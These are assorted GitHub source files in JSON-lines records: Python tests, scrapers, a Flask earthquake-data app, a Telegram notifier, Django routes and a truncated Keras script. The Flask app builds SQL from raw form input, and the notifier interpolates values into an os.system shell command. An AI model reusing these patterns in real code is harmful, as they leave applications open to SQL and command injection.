\"cleanup\"\n\n ucs_ntsd.owner_sid = self.DA_SID\n self.modify_sd_on_ucs_ldap_gpo(ucs_dn, ucs_ntsd)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n self.assert_owner(ucs_ntsd, self.DA_SID, logtag=PHASE)\n\n self.wait_for_object_usn_change(ldb_msg, logtag=PHASE)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not re-synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n\nclass Testcase_GPO_Security_Descriptor_SAM_to_UDM(Testclass_GPO_Security_Descriptor):\n\n def run(self):\n sync_from = \"SAM\"\n sync_to = \"UDM\"\n print(\"GPO Security Descriptor sync from %s to %s\" % (sync_from, sync_to))\n PHASE = \"preparation\"\n\n self.create_gpo(logtag=PHASE)\n print('GPO Name: %s' % self.gponame)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n\n ucs_dn = str(ldb_msg.dn).lower().replace(self.ucr[\"samba4/ldap/base\"].lower(), self.ucr[\"ldap/base\"].lower())\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor differs between %s and %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"test\"\n\n sam_ntsd.owner_sid = self.DU_SID\n self.admin_samdb_sdutil.modify_sd_on_dn(str(ldb_msg.dn), sam_ntsd)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DU_SID, logtag=PHASE)\n\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n print('ucs_ntsd.as_sddl: %s' % ucs_ntsd.as_sddl())\n print('sam_ntsd.as_sddl: %s' % sam_ntsd.as_sddl())\n utils.fail(\"ERROR: %s: NT Security descriptor not synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"cleanup\"\n\n sam_ntsd.owner_sid = self.DA_SID\n self.admin_samdb_sdutil.modify_sd_on_dn(str(ldb_msg.dn), sam_ntsd)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not re-synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n\nif __name__ == \"__main__\":\n s4connector.exit_if_connector_not_running()\n\n with udm_test.UCSTestUDM() as udm:\n with Testcase_GPO_Security_Descriptor_SAM_to_UDM(udm) as test:\n test.run()\n\n with Testcase_GPO_Security_Descriptor_UDM_to_SAM(udm) as test:\n test.run()\n","repo_name":"univention/univention-corporate-server","sub_path":"test/ucs-test/tests/52_s4connector/100sync_gpo_ntsecurity_descriptor.py","file_name":"100sync_gpo_ntsecurity_descriptor.py","file_ext":"py","file_size_in_byte":16159,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"39105711607","text":"import requests\nimport pandas as pd\nimport time\nfrom datetime import datetime\nimport sys\nimport os\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom elasticsearch_dsl import GeoPoint\n\nes_client = Elasticsearch(http_compress=True)\n\nGeoPoint.to_dict = lambda self: {'lat': self.lat, 'lon': self.lon}\n\ndef get_data():\n url = 'http://api.citybik.es/v2/networks/citybikes-helsinki'\n try:\n res = requests.get(url)\n city_bikes = res.json()\n df = pd.DataFrame.from_dict(city_bikes['network']['stations'])\n df = df[1:].drop('extra', axis=1) #Discard first row, drop 'extra' column\n df['timestamp'] = df['timestamp'].apply(safe_date)\n df['location'] = df[['latitude', 'longitude']].apply(create_geopoint, axis=1)\n return df\n except requests.exceptions.ConnectionError:\n print('{}: Connection failed'.format(stamp))\n sys.exit(1)\n\ndef safe_date(date_value):\n return (\n pd.to_datetime(date_value) if not pd.isna(date_value)\n else datetime(1970,1,1,0,0)\n )\n\ndef create_geopoint(row):\n return {'lat': row['latitude'], 'lon': row['longitude']}\n\ndef doc_generator(df):\n df_iter = df.iterrows()\n ts = time.time()\n stamp = datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H')\n for index, document in df_iter:\n yield {\n \"_index\": 'hsl_bike_{0}'.format(stamp),\n \"_type\": \"_doc\",\n \"_id\" : f\"{document['id']}\",\n \"_source\": document.to_dict(),\n }\n raise StopIteration\n\nif __name__ == '__main__':\n data = get_data()\n helpers.bulk(es_client, doc_generator(data))\n\n","repo_name":"bipartite/hsl_bike2","sub_path":"fetch_bike_data.py","file_name":"fetch_bike_data.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72920475615","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport download\nfrom lxml.etree import HTML\nimport re\nimport time\n\nclass getKeyword(object):\n def __init__(self):\n self.down = download.Download()\n self.kw_list = []\n with open('results.txt','w') as f:\n f.write('')\n\n def get_url(self):\n url = input('请输入要查询的网站(eg:http://www.xxx.com):')\n if url[-1] == '/':\n url = url[:-1]\n domain = re.match('((http|https)://[a-zA-Z1-9]+.).*?$', url).group(1)\n domain = url.replace(domain, '')\n urls_list = []\n url_obj = {\n 'url': url,\n 'domain': domain,\n }\n urls_list.append(url_obj)\n # try:\n # with open('urls.txt') as f:\n # results = f.readlines()\n # for res in results:\n # try:\n # url = res.strip()\n # domain = re.match('(http://[a-zA-Z1-9]+.).*?$', url).group(1)\n # domain = url.replace(domain, '')\n # url_obj = {\n # 'url': url,\n # 'domain': domain,\n # }\n # urls_list.append(url_obj)\n # except:\n # print('该行文本格式有误')\n # print(res)\n # with open('failed_urls.txt', 'a') as ff:\n # ff.write(res)\n # except:\n # print('当前目录没有url.txt文本')\n # time.sleep(60)\n return urls_list\n\n def get_keyword(self,response):\n html = HTML(response.text)\n url_list = html.xpath('//a/@href')\n self.parse_keyword(response)\n exits_url = []\n for url in url_list:\n if re.match('^/.*?aspx$',url):\n two_url = 'http://www.aliwuxi.com' + url\n elif re.match('http://.*?aspx$',url):\n two_url = url\n else:\n continue\n\n if two_url in exits_url:\n continue\n else:\n exits_url.append(two_url)\n print(two_url)\n two_response = self.down.get_html(two_url)\n self.parse_keyword(two_response)\n self.kw_list = list(filter(None, self.kw_list))\n self.kw_list = list(set(self.kw_list))\n return self.kw_list\n\n def parse_keyword(self,response):\n html = HTML(response.text)\n domain_kw = html.xpath('string(//meta[@name=\"keywords\"]/@content)').split(',')\n if len(domain_kw) < 1:\n return None\n self.kw_list = self.kw_list + domain_kw","repo_name":"Geek-007/spiders","sub_path":"suchmaschine/getKeyword.py","file_name":"getKeyword.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37769962424","text":"\nimport string\nfrom concurrent.futures import Future\n\nfrom keypad.api import interactive\nfrom keypad.abstract.code import IndentRetainingCodeModel, AbstractCompletionResults\nfrom keypad.core.syntaxlib import SyntaxHighlighter\nfrom keypad.core.processmgr.client import AsyncServerProxy, RemoteError\nfrom keypad.core.fuzzy import FuzzyMatcher, Filter\nfrom keypad.core.conftree import ConfTree\nfrom keypad.core.executors import SynchronousExecutor\nfrom keypad.buffers import Cursor\n\n\nfrom .modelworker import (InitWorkerTask, \n CompletionTask, \n FindRelatedTask, \n GetDocsTask, \n GetDiagnosticsTask,\n GetCallTipTask)\nfrom .config import CXXConfig \nclass CXXCompletionResults(AbstractCompletionResults):\n def __init__(self, token_start, runner, results):\n '''\n token_start - the (line, col) position at which the token being completed starts\n '''\n super().__init__(token_start)\n self._runner = runner\n self._results = results \n self.filter()\n \n def doc_async(self, index):\n '''\n Return a Future for the documentation for a given completion result as a list of \n AttributedString. \n '''\n \n return self._runner.submit(GetDocsTask(self._filt.indices[index]))\n\n @property\n def rows(self):\n '''\n Return a list of tuples of AttributedString containing the contents of \n each column for each row in the completion results.\n '''\n \n return self._filt.rows\n \n def text(self, index):\n '''\n Return the text that should be inserted for the given completion.\n '''\n return self._filt.rows[index][0].text\n\n def filter(self, text=''):\n '''\n Filter the completion results using the given text.\n '''\n \n fm = FuzzyMatcher(text)\n self._filt = fm.filter(self._results, lambda item: item[0].text)\n # sort exact matches first\n self._filt.sort(lambda item: 0 if item[0].text.startswith(text) else 1)\n \n def dispose(self):\n pass\n \n\nclass CXXCodeModel(IndentRetainingCodeModel):\n completion_triggers = ['.', '::', '->']\n call_tip_triggers = ['(', ')']\n line_comment = '//'\n \n def __init__(self, *args, **kw):\n super().__init__(*args, **kw)\n self.cxx_config = CXXConfig.from_config(self.conf)\n self.cxx_config.value_changed.connect(self._update_configuration)\n \n try:\n self.prox = AsyncServerProxy(InitWorkerTask(self.cxx_config))\n self.prox.start()\n# self.prox.submit().result()\n except RemoteError as exc:\n self.prox.shutdown()\n cause = exc.__cause__ or exc\n interactive.run('show_error', cause)\n\n\n \n def submit_task(self, task, transform=None):\n '''\n Public interface for submitting tasks to be run in the completion process.\n \n Task must be a pickleable callable that takes one argument. The argument will\n be a SimpleNamespace object containing a field `engine`. The `engine` field \n contains an instance of `modelworker.Engine`.\n \n The result of the task is returned as a future. If a transform is provided, the\n transform will be applied clientside (i.e., not in the completion process) \n before setting the future's result. This means that the transform need not be \n pickleable.\n '''\n \n return self.prox.submit(task, transform)\n\n def _update_configuration(self, k, v):\n self.submit_task(InitWorkerTask(self.cxx_config))\n \n\n def _find_token_start(self, pos):\n c = Cursor(self.buffer).move(pos)\n\n wordchars = string.ascii_letters + string.digits + '_$'\n for i, ch in reversed(list(enumerate(c.line[:c.x]))):\n if ch not in wordchars:\n break\n else:\n i = -1\n \n\n return c.y, i + 1\n \n def completions_async(self, pos):\n '''\n Return a future to the completions available at the given position in the document.\n \n Raise NotImplementedError if not implemented.\n '''\n tstart = self._find_token_start(pos)\n return self.prox.submit(\n CompletionTask(\n self.path,\n tstart,\n [(str(self.path), self.buffer.text)]\n ),\n transform=lambda r: CXXCompletionResults(tstart, self.prox, r)\n )\n \n def find_related_async(self, pos, types):\n '''\n Find related names for the token at the given position. \n \n Raises NotImplementedError by default.\n \n :rtype: concurrent.futures.Future of list of RelatedName\n '''\n \n return self.prox.submit(\n FindRelatedTask(\n types,\n self.path,\n pos,\n [(str(self.path), self.buffer.text)]\n )\n )\n\n \n def highlight(self):\n '''\n Rehighlight the buffer. \n \n Note: This is different than other methods in the code model in that\n it involves mutation of the buffer, and it may be better to make\n the code model a factory for a \"Highlighter\" object. \n '''\n\n from .syntax import cpplexer\n \n highlighter = SyntaxHighlighter(\n 'keypad.plugins.cpp.syntax',\n cpplexer(),\n dict(lexcat=None)\n )\n \n highlighter.highlight_buffer(self.buffer)\n \n \n @property\n def can_provide_diagnostics(self):\n return True\n \n def diagnostics_async(self):\n return self.prox.submit(\n GetDiagnosticsTask(\n self.path,\n None,\n [(str(self.path), self.buffer.text)]\n )\n )\n \n @property\n def can_provide_call_tips(self):\n return True\n \n\n def call_tip_async(self, pos):\n c = Cursor(self.buffer).move(pos)\n \n depth = 1\n \n for ch in c.walk(-1):\n if ch == '(':\n depth -= 1\n elif ch == ')':\n depth += 1\n \n if depth == 0:\n break\n \n else:\n # Can't get call tip here. \n return SynchronousExecutor.submit(lambda: None)\n \n start = self._find_token_start(c.pos)\n text = Cursor(self.buffer).move(start).text_to(c)\n\n return self.prox.submit(GetCallTipTask(\n text,\n self.path,\n start,\n [(str(self.path), self.buffer.text)]\n ))\n \n def dispose(self):\n '''\n Release system resources held by the model.\n '''\n \n self.prox.shutdown()\n \n","repo_name":"sam-roth/Keypad","sub_path":"keypad/plugins/cpp/cppmodel.py","file_name":"cppmodel.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29777867514","text":"from typing import List, Dict, Optional\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass CocoAnnotation(object):\n def __init__(self):\n self.id: int = 0\n self.image_id: int = 0\n self.category_id: int = 0\n self.bbox: Optional[List[float]] = None\n\n def set(self, image_id: int, category_id: int, bbox: List[float], annotation_id: int = 0):\n if annotation_id > 0:\n self.id = annotation_id\n self.image_id = image_id\n self.category_id = category_id\n self.bbox = bbox\n\n def json(self) -> Dict:\n annotation_json = dict()\n annotation_json[\"id\"] = self.id\n annotation_json[\"image_id\"] = self.image_id\n annotation_json[\"category_id\"] = self.category_id\n annotation_json[\"bbox\"] = self.bbox\n return annotation_json\n\n\nclass CocoAnnotations(object):\n\n def __init__(self, ds_type: int):\n self.ds_type: int = ds_type\n self.annotations: Dict = dict()\n\n def add(self, annotation_id: int, annotation: CocoAnnotation) -> None:\n annotation.id = annotation_id\n self.annotations[annotation_id] = annotation\n\n def get(self, annotation_id: int) -> Optional[CocoAnnotation]:\n if annotation_id not in self.annotations:\n return None\n return self.annotations[annotation_id]\n\n def json(self, annotation_id: int) -> Optional[Dict]:\n annotation = self.get(annotation_id)\n if not annotation:\n logger.error(f\"annotation_id:{annotation_id} not found\")\n return None\n return annotation.json()\n","repo_name":"naomori/oidconv","sub_path":"src/oidconv/coco_annotation.py","file_name":"coco_annotation.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20953029482","text":"\"\"\"Client\"\"\"\nimport tcp\n\n\ndef Main():\n # local host IP '127.0.0.1'\n host = '127.0.0.1'\n\n # Define the port on which you want to connect\n port = 3322\n\n client = tcp.TCP_Client(host, port)\n\n # message you send to server\n while client.tcp.connected:\n command = input(\"Enter command: \")\n value = input(\"Enter value: \")\n client.send({command: value})\n\n try:\n data = client.receive()\n print('Received from the server :')\n print(data)\n except tcp.TCPTimeout:\n print('Socket Timeout, awaiting new commands')\n\n # close the connection\n client.close()\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"HimavaanChandra/laserRobots","sub_path":"TCP/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"15902852991","text":"#!/usr/bin/env python\n\"\"\"\nGet server hostname or IP address for the given inventory file and group.\n\nThe server name or IP is printed on stdout on success.\nErrors and help output are printed on stderr.\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport argparse\nfrom os.path import dirname\n\nROOT = dirname(dirname(dirname(os.path.abspath(__file__))))\n\n\nclass ArgParser(argparse.ArgumentParser):\n\n def print_help(self, stream=sys.stderr):\n # print help to stderr by default\n super(ArgParser, self).print_help(stream)\n\n\ndef read_inventory_file(filename):\n \"\"\"\n filename is a path to an ansible inventory file\n\n returns a mapping of group names (\"webworker\", \"proxy\", etc.)\n to lists of hosts (ip addresses)\n\n \"\"\"\n from ansible.inventory import InventoryParser\n\n return {name: [host.name for host in group.get_hosts()]\n for name, group in InventoryParser(filename).groups.items()}\n\n\ndef get_instance_group(instance, group):\n servers = read_inventory_file(\n os.path.join(ROOT, 'fab', 'inventory', instance))\n return servers[group]\n\n\ndef main():\n prog = os.environ.get(\"SCRIPT\", sys.argv[0])\n parser = ArgParser(\n prog=prog,\n usage=\"{prog} [-h] environment [user@]group[:n] [{uprog}_ARGS]\".format(\n prog=prog,\n uprog=prog.rsplit(\"/\", 1)[-1].upper(),\n ),\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\"environment\",\n help=\"Environment: production, staging, ...\")\n parser.add_argument(\"group\",\n help=\"Server group: postgresql, proxy, webworkers, ... The server \"\n \"group may be prefixed with 'username@' to login as a specific \"\n \"user and may be terminated with ':' to choose one of \"\n \"multiple servers if there is more than one in the group. \"\n \"For example: webworkers:0 will pick the first webworker.\")\n\n args = parser.parse_args()\n group = args.group\n if \"@\" in group:\n username, group = group.split('@', 1)\n username += \"@\"\n else:\n username = \"\"\n if ':' in group:\n group, index = group.rsplit(':', 1)\n try:\n index = int(index)\n except (TypeError, ValueError):\n parser.error(\"Non-numeric group index: {}\".format(index))\n else:\n index = None\n\n try:\n servers = get_instance_group(args.environment, group)\n except IOError as err:\n parser.error(err)\n except KeyError as err:\n parser.error(\"Unknown group: {}\\n\".format(group))\n\n if index is not None and index > len(servers) - 1:\n sys.stderr.write(\n \"Invalid group index: {index}\\n\"\n \"Please specify a number between 0 and {max} inclusive\\n\"\n .format(index=index, max=len(servers) - 1)\n )\n sys.exit(1)\n if len(servers) > 1:\n if index is None:\n sys.stderr.write(\n \"There are {num} servers in the '{group}' group\\n\"\n \"Please specify the index of the server. Example: {group}:0\\n\"\n .format(num=len(servers), group=group)\n )\n sys.exit(1)\n server = servers[index]\n else:\n server = servers[index or 0]\n\n print(username + server)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WDDCP/commcare-wddcp","sub_path":"scripts/inventory/getinventory.py","file_name":"getinventory.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13643885043","text":"#!/usr/bin/env python\n#coding=utf-8\n#__author__ = louis,\n# __date__ = 2017-08-16 14:49,\n# __email__ = yidongsky@gmail.com,\n# __name__ = urls.py\n\nfrom django.conf.urls import url\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom .views import (\n StatusView,\n AlertListView,\n NewAlertView,\n EditAlertView,\n DeleteAlertView,\n HostListView,\n HostDetailView,\n RecordDataApiView,\n SelectDataApiView\n)\n\nurlpatterns = [\n\n url(r'^alerts/$', login_required(AlertListView.as_view()), name='alerts-list'),\n url(r'^alerts/new/$', login_required(NewAlertView.as_view()), name='alerts-new'),\n url(r'^alerts/(?P\\d+)/edit/$', login_required(EditAlertView.as_view()),name='alerts-edit'),\n url(r'^alerts/(?P\\d+)/delete/$', login_required(DeleteAlertView.as_view()),name='alerts-delete'),\n url(r'^record/$', csrf_exempt(RecordDataApiView.as_view()),name='record-data'),\n url(r'^select/$', SelectDataApiView.as_view(),name='Select-data'),\n url(r'^hosts/$', login_required(HostListView.as_view()), name='hosts-list'),\n url(r'^(?P\\d+)/$', HostDetailView, name='hosts-detail'),\n url(r'^$', StatusView.as_view(), name=\"status\"),\n]\n","repo_name":"luyidong/logMonitor","sub_path":"data_collector/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"10392186237","text":"import os\nimport json\nimport requests\nfrom ..utils.confset import ConfItem, ConfSet\nfrom .notificationprovider import NotificationProvider\nimport urllib.parse\n\nConfSet.addItem(ConfItem('notification.telegram.enabled', None, bool, 'enable telegram notification'))\nConfSet.addItem(ConfItem('notification.telegram.apiToken', None, str, 'telegram api token'))\nConfSet.addItem(ConfItem('notification.telegram.chatIds', None, str, 'telegram chat ids'))\n\nclass TelegramNotification(NotificationProvider):\n\tLOG_LEVEL = 0\n\n\tdef __init__(self, conf):\n\t\tsuper().__init__(conf)\n\t\ttry:\n\t\t\tself.apiToken = conf.getOrDefault('notification.telegram.apiToken').strip('\\\"')\n\t\t\tself.chatIds = json.loads(conf.getOrDefault('notification.telegram.chatIds'))\n\n\t\texcept:\n\t\t\tself.apiToken = \"\"\n\t\t\tself.chatIds = \"\"\n\n\tdef sendPhoto(self, photo):\n\t\tfor ci in self.chatIds:\n\t\t\tos.system('curl -F photo=@\"./%s\" https://api.telegram.org/bot%s/sendPhoto?chat_id=%s' % (photo, self.apiToken, ci))\n\n\tdef send(self, st):\n\t\tprint(st.encode('utf-8'))\n\t\tfor x in self.chatIds:\n\t\t\trequests.get(f'https://api.telegram.org/bot{self.apiToken}/sendMessage?text={st}&chat_id={x}').json()\n\n\tdef format(self, name, string):\n\t\treturn urllib.parse.quote('#' + name + ' ' + string)","repo_name":"openbitlab/celestia-srvcheck","sub_path":"srvcheck/notification/telegramnotification.py","file_name":"telegramnotification.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"21135642824","text":"#Name:PRADEEP RAVICHANDRAN\n#CSE 6331-Cloud Computing\n\nimport os\nfrom flask import Flask, render_template, request\nimport sqlite3 as sql\nimport pandas as pd\nimport random\nimport time\nimport redis\nimport sqlite3, csv, base64\n\napplication = Flask(__name__)\ncon=sqlite3.connect('eq.db')\n\n#creating cursor to perform database operations\ncursor = con.cursor()\ncon.commit()\n\n#@application.route are decorators in Flask\n@application.route('/')\ndef index():\n return render_template('home.html')\n\n@application.route('/netid')\ndef netid():\n return render_template('netid.html')\n\n@application.route('/randr')\ndef randr():\n return render_template('random.html')\n\n#Function using Amazon Elasticache-memcache\n@application.route('/randomqueries',methods=['GET','POST'])\ndef randomqueries():\n red = redis.StrictRedis(host='memcachedcloud-001.y2bx3p.0001.use2.cache.amazonaws.com', port=6379, db=0)\n print(\"flushing\")\n con = sql.connect(\"eq.db\")\n first = request.form['netid']\n loop = request.form['number']\n letter = first + '%'\n print(letter)\n query = \"select * from earthquake where net LIKE '%s' \" % letter\n cursor = con.cursor()\n cursor.execute(str(query))\n ran = cursor.fetchall()\n li= list(ran)\n print(li)\n start = time.time()\n for i in range(0,int(loop)):\n r = random.choice(li)\n key = str(i)\n value = red.get(key)\n rows = []\n rows1 = []\n cursor.execute(\"select time from earthquake where net LIKE '%s' \" % r)\n rows = cursor.fetchone()\n cursor.execute(\"select locationSource from earthquake where net LIKE '%s' \" % r)\n rows1 = cursor.fetchone()\n if not value:\n cursor = con.cursor()\n cursor.execute(\"select net from earthquake where net LIKE '%s' \" % r)\n count = cursor.rowcount\n cursor.close()\n red.set(key, count)\n if i == 0:\n ending = time.time()\n tot = ending - start\n end = time.time()\n total = end-start\n\n return render_template('randomresult.html',loop=loop,total=total,tot=tot,rows=rows,rows1=rows1)\n\n#Random queries generating function without memcache\n@application.route('/randomwithoutmemcache',methods=['GET','POST'])\ndef randomwithoutmemcache():\n con = sql.connect(\"eq.db\")\n Number = request.form['number']\n triplets = int(Number)/3\n cursor = con.cursor()\n quer = \"select * from earthquake\"\n cursor.execute(str(quer))\n list1= []\n ran = cursor.fetchall()\n dic= list(ran)\n print(dic)\n start = time.time()\n for i in range(0, int(Number)):\n r = random.choice(dic)\n print(r)\n for i in range(0,int(triplets)):\n cursor = con.cursor()\n cursor.execute(\"Insert into earthquake (time,latitude,longitude) Values (2018-06-07 , 13 , 14)\")\n rows = cursor.fetchall()\n cursor.execute(\"select Count(time) from earthquake\")\n row = cursor.fetchone()\n end = time.time()\n total = end-start\n\n return render_template('randomresult1.html',total=total,rows=rows,row=row,Number=Number)\n\n#function to generate random restricted queries without using memcache\n@application.route('/randomrestrictedwithoutmemcache',methods=['GET','POST'])\ndef randomrestrictedwithoutmemcache():\n con = sql.connect(\"eq.db\")\n con.row_factory = sql.Row\n count = request.form['number']\n query = 'select * from earthquake where place LIKE \"%CA\" AND mag <'\n lis=[]\n start = time.time()\n for i in range(0,int(count)):\n r = random.random()\n a = str((r * 5.5) + 0.5001)\n b = query + a\n cursor = con.cursor()\n cursor.execute(b)\n rows = cursor.fetchall()\n lis.append(rows)\n print(i)\n #print(rows)\n\n end = time.time()\n total = end-start\n\n return render_template('randomresresult.html',count=count,total=total,lis=lis)\n\n#to get the size of the current working directory\n@application.route('/getsize')\ndef getsize():\n cwd = os.getcwd()\n total_size = os.path.getsize(cwd)\n\n return render_template('size.html',size=total_size)\n\n#to read CSV and to create a Table\n@application.route('/csv', methods=['GET','POST'])\ndef csv():\n if request.method == 'POST':\n try:\n #converting csv file into table with values\n if request.method == 'POST':\n file = request.files['myfile']\n con = sqlite3.connect('eq.db')\n con.row_factory = sql.Row\n csv = pd.read_csv(file)\n csv.to_sql(name=\"earthquake\", con=con, if_exists=\"replace\", index=False)\n cursor = con.cursor()\n cursor.execute(\"select * from earthquake\")\n row = cursor.fetchall()\n con.close()\n\n except:\n con.rollback()\n finally:\n return render_template(\"home.html\")\n con.close()\n print(msg)\n\n#function to list the table\n@application.route('/lists')\ndef lists():\n if request.method == 'POST':\n file = request.files['myfile']\n con = sqlite3.connect('eq.db')\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute(\"select * from earthquake\")\n row = cursor.fetchall()\n cursor.execute(\"select Count(mag) from earthquake\")\n count = cursor.fetchall()\n\n return render_template(\"list.html\", row=row,count=count)\n\nif __name__ == '__main__':\n application.run(debug=True)\n\n","repo_name":"PradeepRavichandran1811/Cloud-MemcachedProject-AWS","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2177878411","text":"########### import 模型用到的 package ###########\nimport numpy as np\nfrom keras.utils import np_utils\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.models import Sequential\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras import optimizers\nfrom keras import regularizers\nimport tensorflow as tf\nimport os\n\n################### GPU運算設定 ###################\n# 指定第幾張 GPU \nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\n# 自動增長 GPU 記憶體用量\n#gpu_options = tf.GPUOptions(allow_growth=True)\n \n# 只使用 xx% 的 GPU 記憶體\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n# 設定 Keras 使用的 Session\ntf.keras.backend.set_session(sess)\n\n\n################# load data ###################\nprotein = 'EGFR_family'\ndata_fp = pd.read_csv('data/EGFR_family_cm_f34_half_test_all_act.csv', header=None)\n\nx_feature = data_fp.values[:, 2::]\ny_label = data_fp.values[:, 0:2]\nprint(\"---------------------- Data information ----------------------\")\nprint('EGFR_data:\\n',data_fp.head(10))\nprint('x_feature:', x_feature.shape)\nprint('y_label:', y_label.shape)\n\n############################## plot figure ###############################\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n\ndef plot_roc_curve(fpr,tpr): \n plt.plot(fpr,tpr) \n plt.axis([0,1,0,1]) \n plt.xlabel('False Positive Rate') \n plt.ylabel('True Positive Rate') \n plt.title('ROC curve')\n plt.show()\n\n################################## result list ####################################\n\ncv_acc = []\ncv_sen = []\ncv_spe = []\ncv_auc = []\ncv_mcc = []\ncv_f1 = []\n\nrandom_seed = 2\ncv_n = 1\n\n######################### 劃分 train跟test data #########################\ntrain_x, test_x, train_smile_y, test_smile_y = train_test_split(x_feature, y_label, train_size=0.8, test_size=0.2, random_state=random_seed)\ntrain_y = train_smile_y[:,1]\ntest_y = test_smile_y[:,1]\n\ntrain_x = tf.keras.backend.cast_to_floatx(train_x)\ntest_x = tf.keras.backend.cast_to_floatx(test_x)\ntrain_y = tf.keras.backend.cast_to_floatx(train_y)\ntest_y = tf.keras.backend.cast_to_floatx(test_y)\n\n\n################ print出data基本資料 ################\n\nprint('all:', x_feature.shape)\nprint('train_x:', train_x.shape)\nprint('test_x:', test_x.shape)\nlabel_set = train_y.tolist()\n#label_set = label_set.reset_index(drop=True)\nlabel_count1 = label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##train:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\n\nlabel_set = test_y.tolist()\n#label_set = label_set.reset_index(drop=True)\nlabel_count1 = label_set.count(1)\nlabel_count0 = label_set.count(0)\nprint(\"##test:\")\nprint('p:',label_count1)\nprint('n:',label_count0)\n\nlabel_set = y_label[:,1].tolist()\n#label_set = 